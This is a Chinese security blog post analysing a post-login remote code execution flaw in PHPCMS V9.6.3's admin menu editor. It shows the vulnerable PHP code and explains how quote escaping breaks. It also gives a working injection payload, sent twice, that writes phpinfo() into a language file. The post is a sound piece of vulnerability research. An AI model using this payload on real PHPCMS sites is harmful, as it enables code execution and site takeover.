<!DOCTYPE html><html lang="zh-Hans"><head><meta name="generator" content="Hexo 3.8.0"><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="PHPCMS V9.6.3 后台一处 RCE"><meta name="keywords" content="PHP,代码审计"><meta name="author" content="J0k3r"><meta name="copyright" content="J0k3r"><title>PHPCMS V9.6.3 后台一处 RCE | J0k3r's Blog</title><link rel="shortcut icon" href="/img/fav.png"><link rel="stylesheet" href="/css/index.css?version=1.6.1"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.6.1"><link rel="dns-prefetch" href="https://cdn.staticfile.org"><link rel="dns-prefetch" href="https://cdn.bootcss.com"><link rel="dns-prefetch" href="https://creativecommons.org"><link rel="dns-prefetch" href="https://hm.baidu.com"><script>var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?9e8a6ba1f41c0d7b000fcfd73f1c7929";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();</script><link rel="dns-prefetch" href="https://www.google-analytics.com"><script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

ga('create', 'UA-159554347-1', 'auto');
ga('send', 'pageview');</script><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  }
} </script></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#一处-phpcms-后台-GetShell"><span class="toc-number">1.</span> <span class="toc-text">一处 phpcms 后台 GetShell</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#第一次"><span class="toc-number">1.1.</span> <span class="toc-text">第一次</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#第二次"><span class="toc-number">1.2.</span> <span class="toc-text">第二次</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">J0k3r</div><div class="author-info__description text-center">求知若饥，虚心若愚</div><div class="follow-button"><a href="https://github.com/zhuxianjin">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">37</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">36</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">友链</div><a class="author-info-links__name text-center" href="https://p0sec.net/">p0神</a><a class="author-info-links__name text-center" href="http://seaii-blog.com/">seaii</a><a class="author-info-links__name text-center" href="http://0sec.com.cn/">everglow</a><a class="author-info-links__name text-center" href="http://mengsec.com/">MengChen</a><a class="author-info-links__name text-center" href="http://windylh.com/">Windylh</a><a class="author-info-links__name text-center" href="http://p0desta.com/">p0desta</a><a class="author-info-links__name text-center" href="http://lanvnal.com/">LANVNAL</a><a class="author-info-links__name text-center" href="http://syf.ac.cn/">7N1ght</a><a class="author-info-links__name text-center" href="http://wzt.ac.cn/">WCatalpa.T</a><a class="author-info-links__name text-center" href="https://daolgts.github.io/">daolgts</a><a class="author-info-links__name text-center" href="https://qingchenldl.github.io">V0W</a><a class="author-info-links__name text-center" href="https://fancyking.ml/">fancyking</a><a class="author-info-links__name text-center" href="http://asa9ao.xyz/">Asa9ao</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://i.loli.net/2020/02/01/sHdohVBU8nlmARP.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">J0k3r's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus"><a class="site-page" href="/">主页</a><a class="site-page" href="/archives">归档</a><a class="site-page" href="/tags">标签</a><a class="site-page" href="/links/">友链</a><a class="site-page" href="/about/">关于我</a></span></div><div id="post-info"><div id="post-title">PHPCMS V9.6.3 后台一处 RCE</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2019-10-09</time></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>没想到这个洞撞了。。。</p>
<a id="more"></a>
<p>版本与环境</p>
<p>PHPCMS程序版本：Phpcms V9.6.3 Release 20170515 </p>
<p>操作系统：Darwin</p>
<p>服务器软件：ApachePHP/5.6.37</p>
<p>MySQL 版本：5.7.26</p>
<p><a href="http://127.0.0.1:9000/index.php?m=member&amp;c=member_menu&amp;a=add&amp;pc_hash=wCuF7w" target="_blank" rel="noopener">http://127.0.0.1:9000/index.php?m=member&amp;c=member_menu&amp;a=add&amp;pc_hash=wCuF7w</a></p>
<p>dosubmit=1&amp;language=%0a%0d’;//</p>
<h2 id="一处-phpcms-后台-GetShell"><a href="#一处-phpcms-后台-GetShell" class="headerlink" title="一处 phpcms 后台 GetShell"></a>一处 phpcms 后台 GetShell</h2><p>漏洞代码位于 <code>/phpcms/modules/admin/menu.php</code> 第 81 行</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">edit</span><span class="params">()</span> </span>&#123;</span><br><span class="line">	<span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'dosubmit'</span>])) &#123;</span><br><span class="line">		$id = intval($_POST[<span class="string">'id'</span>]);</span><br><span class="line">		<span class="comment">//print_r($_POST['info']);exit;</span></span><br><span class="line">		$r = <span class="keyword">$this</span>-&gt;db-&gt;get_one(<span class="keyword">array</span>(<span class="string">'id'</span>=&gt;$id));</span><br><span class="line">		<span class="keyword">$this</span>-&gt;db-&gt;update($_POST[<span class="string">'info'</span>],<span class="keyword">array</span>(<span class="string">'id'</span>=&gt;$id));</span><br><span class="line">		<span class="comment">//修改语言文件</span></span><br><span class="line">		$file = PC_PATH.<span class="string">'languages'</span>.DIRECTORY_SEPARATOR.<span class="string">'zh-cn'</span>.DIRECTORY_SEPARATOR.<span class="string">'system_menu.lang.php'</span>;</span><br><span class="line">		<span class="keyword">require</span> $file;</span><br><span class="line">		$key = $_POST[<span class="string">'info'</span>][<span class="string">'name'</span>];</span><br><span class="line">		<span class="keyword">if</span>(!<span class="keyword">isset</span>($LANG[$key])) &#123;</span><br><span class="line">			$content = file_get_contents($file);</span><br><span class="line">			$content = substr($content,<span class="number">0</span>,<span class="number">-2</span>);</span><br><span class="line">			$data = $content.<span class="string">"\$LANG['$key'] = '$_POST[language]';\r\n?&gt;"</span>;</span><br><span class="line">			file_put_contents($file,$data);</span><br><span class="line">		&#125; <span class="keyword">elseif</span>(<span class="keyword">isset</span>($LANG[$key]) &amp;&amp; $LANG[$key]!=$_POST[<span class="string">'language'</span>]) &#123;</span><br><span class="line">			$content = file_get_contents($file);</span><br><span class="line">			$content = str_replace($LANG[$key],$_POST[<span class="string">'language'</span>],$content);</span><br><span class="line">			file_put_contents($file,$content);</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">$this</span>-&gt;update_menu_models($id, $r, $_POST[<span class="string">'info'</span>]);			</span><br><span class="line">		<span class="comment">//结束语言文件修改</span></span><br><span class="line">		showmessage(L(<span class="string">'operation_success'</span>));</span><br><span class="line">	&#125; <span class="keyword">else</span> &#123;</span><br><span class="line"></span><br><span class="line">	.  .  .   .  .  .  </span><br><span class="line"></span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这段代码是修改语言文件用的，而这个语言文件就是 /phpcms/languages/zh-cn/system_menu.lang.php</p>
<p>里面一堆类似 <code>$LANG[&#39;video&#39;] = &#39;视频&#39;;</code> 的东西</p>
<p>当时用 rips 扫描发现的大多是 <code>$data = $content.&quot;\$LANG[&#39;$key&#39;] = &#39;$_POST[language]&#39;;\r\n?&gt;&quot;;</code> 这种拼接操作，而且 POST 中的单引号会被转义，无法逃逸</p>
<p>转义代码位于 /phpcms/libs/classes/param.class.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span> </span>&#123;</span><br><span class="line">	<span class="keyword">if</span>(!get_magic_quotes_gpc()) &#123;</span><br><span class="line">		$_POST = new_addslashes($_POST);</span><br><span class="line">		$_GET = new_addslashes($_GET);</span><br><span class="line">		$_REQUEST = new_addslashes($_REQUEST);</span><br><span class="line">		$_COOKIE = new_addslashes($_COOKIE);</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">. . .   . . . </span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>而这里突然看到一个 str_replace ， <code>str_replace($LANG[$key],$_POST[&#39;language&#39;],$content)</code>，感觉可能会有漏洞</p>
<p>一番胡乱测试之后惊奇的发现网站 500 了，细看原来是单引号逃逸导致报错</p>
<p>下面是漏洞分析过程</p>
<p>首先要登录后台拿到 pc_hash 的值，这个是防止提交恶意数据的，后台首页 F12 就能看到</p>
<p><img src="https://i.loli.net/2020/03/02/C9TRFaHvAMPwnk5.png" alt></p>
<p>然后访问：</p>
<p><code>http://127.0.0.1:9000/index.php?m=admin&amp;c=menu&amp;a=edit&amp;pc_hash=wCuF7w</code></p>
<p>phpcms 的路由和那个 yzmcms 差不多，m 是模块名，对应 /phpcms 下的文件夹，c 是控制器名，对应 /phpcms/模块/ 下的 php 文件名，a    则对应控制器类的类函数名</p>
<p>发送 POST 请求：</p>
<p><code>dosubmit=1&amp;info[name]=1&amp;language=1</code></p>
<p>语言文件最后会新添内容</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$LANG[<span class="string">'1'</span>] = <span class="string">'1'</span>;</span><br></pre></td></tr></table></figure>
<h3 id="第一次"><a href="#第一次" class="headerlink" title="第一次"></a>第一次</h3><p>发送 POST 请求：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dosubmit=1&amp;info[name]=1&amp;language=1&apos;</span><br></pre></td></tr></table></figure>
<p><code>require $file;</code> 引入语言文件，<code>$LANG[$key]</code> 的值还是 NULL，所以执行拼接操作</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$data = $content.<span class="string">"\$LANG['$key'] = '$_POST[language]';\r\n?&gt;"</span>;</span><br><span class="line">file_put_contents($file,$data);</span><br></pre></td></tr></table></figure>
<p>得到语言文件新添内容为</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$LANG[<span class="string">'1'</span>] = <span class="string">'1\''</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<h3 id="第二次"><a href="#第二次" class="headerlink" title="第二次"></a>第二次</h3><p>发送与第一次相同的 POST 请求</p>
<p><code>require $file;</code> 引入语言文件得到 <code>$LANG[$key]</code> 的值是 <code>string(2) &quot;1&#39;&quot;</code>，也就是说，没有反斜杠，这样问题就出现了，我们同样的请求发送了两次，按照代码逻辑来看，是不应该更新 <code>$LANG[$key]</code> 的值的</p>
<p>但是因为 <code>require</code> 和 <code>file_get_contents</code> 函数读取之后的文件内容不含反斜杠，而我们 POST 传入的 language 会被转义处理得到的值是 <code>string(3) &quot;1\&#39;&quot;</code></p>
<p>于是判断 <code>$LANG[$key]!=$_POST[&#39;language&#39;]</code> 就成立了，接着 <code>str_replace</code> 函数进行字符串替换操作，把原来的 <code>$LANG[&#39;1&#39;] = &#39;1\&#39;&#39;;</code> 中的 <code>1&#39;</code> 替换成 <code>1\&#39;</code>，最终写入文件</p>
<p>结果就得到了以下文件内容，第二个单引号被反斜杠转义，无法闭合</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$LANG[<span class="string">'1\'] = '</span><span class="number">1</span>\<span class="string">''</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>payload:</p>
<p>发送两次以下请求，访问语言文件 <a href="http://127.0.0.1:9000/phpcms/languages/zh-cn/system_menu.lang.php" target="_blank" rel="noopener">http://127.0.0.1:9000/phpcms/languages/zh-cn/system_menu.lang.php</a> 即可得到 phpinfo</p>
<p>URL:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1:9000/index.php?m=admin&amp;c=menu&amp;a=edit&amp;pc_hash=wCuF7w</span><br></pre></td></tr></table></figure>
<p>POST:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dosubmit=1&amp;info[name]=];phpinfo();//1&amp;language=];phpinfo();//1&apos;</span><br></pre></td></tr></table></figure>
<p><img src="https://i.loli.net/2020/03/02/QNaTj6nmPUX28rz.png" alt></p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">J0k3r</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://j0k3r.top/2019/10/09/phpcmsv9.6.3_background_rce/">http://j0k3r.top/2019/10/09/phpcmsv9.6.3_background_rce/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://j0k3r.top">J0k3r's Blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/PHP/">PHP</a><a class="post-meta__tags" href="/tags/代码审计/">代码审计</a></div><div class="post-qr-code"><div class="post-qr-code-item"><img class="post-qr-code__img" src="../../../../img/alipay.jpg"><div class="post-qr-code__desc">支付宝打赏</div></div><div class="post-qr-code-item"><img class="post-qr-code__img" src="../../../../img/wechat.jpg"><div class="post-qr-code__desc">微信打赏</div></div></div><div class="social-share"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/js/social-share.min.js"></script><nav id="pagination"><div class="prev-post pull-left"><a href="/2019/10/12/ThinkPHP_pop_v5.1.x/"><i class="fa fa-chevron-left">  </i><span>ThinkPHP v5.1.x POP 链分析</span></a></div><div class="next-post pull-right"><a href="/2019/09/10/js_prototype_pollution/"><span>JavaScript 原型链污染 (Prototype Pollution) &amp;&amp; Hardjs 复现与分析</span><i class="fa fa-chevron-right"></i></a></div></nav><div id="vcomment"></div><script src="https://cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js"></script><script>var notify = 'true' == true ? true : false;
var verify = 'true' == true ? true : false;
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;
window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  appId:'yeOeLCiDRMa7CAnJy2jxA2IY-gzGzoHsz',
  appKey:'eAgtubAYTMshS76hpc1F1UBG',
  placeholder:'Just go go',
  avatar:'mm',
  guest_info:guest_info,
  pageSize:'10',
  lang: 'zh-cn'
})</script></div></div><footer class="footer-bg" style="background-image: url(https://i.loli.net/2020/02/01/sHdohVBU8nlmARP.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2017 - 2020 By J0k3r</div><div class="framework-info"><span>驱动 - </span><a href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file-o"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.6.1"></script><script src="/js/fancybox.js?version=1.6.1"></script><script src="/js/sidebar.js?version=1.6.1"></script><script src="/js/copy.js?version=1.6.1"></script><script src="/js/fireworks.js?version=1.6.1"></script><script src="/js/transition.js?version=1.6.1"></script><script src="/js/scroll.js?version=1.6.1"></script><script src="/js/head.js?version=1.6.1"></script><script>if(/Android|webOS|iPhone|iPod|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
}</script><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/z16.model.json"},"display":{"superSample":2,"width":210,"height":420,"position":"left","hOffset":0,"vOffset":-20},"log":false,"tagMode":false});</script></body></html>